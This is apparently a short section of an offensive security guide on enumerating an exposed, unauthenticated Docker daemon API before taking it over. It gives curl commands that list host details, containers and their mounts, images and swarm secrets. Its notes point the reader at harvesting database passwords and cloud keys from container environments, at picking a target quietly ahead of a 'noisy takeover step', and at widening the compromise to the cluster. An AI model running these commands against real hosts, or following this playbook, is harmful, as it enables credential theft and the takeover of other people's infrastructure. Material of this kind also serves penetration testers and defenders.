API enumeration

Before taking over, read the daemon. The API inventories everything the engine manages, which maps the host and often hands over credentials directly (environment variables, mounted secrets, swarm secrets).

bash
H=tcp://<host>:2375
curl -s $H/info | jq '{Name,ServerVersion,OperatingSystem,Swarm}'
curl -s $H/containers/json?all=1 | jq '.[].Names,.[].Mounts'
curl -s $H/images/json | jq '.[].RepoTags'
curl -s $H/secrets | jq '.[].Spec.Name'        # swarm secrets (names)

Exploitation notes#

  • Container Env and Mounts routinely expose database passwords, cloud keys, and host paths worth targeting.
  • A daemon in a Swarm exposes service and secret metadata, and often the manager role, widening the blast radius to the cluster.
  • Enumeration is read-only and quiet; use it to pick the best container or mount before the noisy takeover step.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more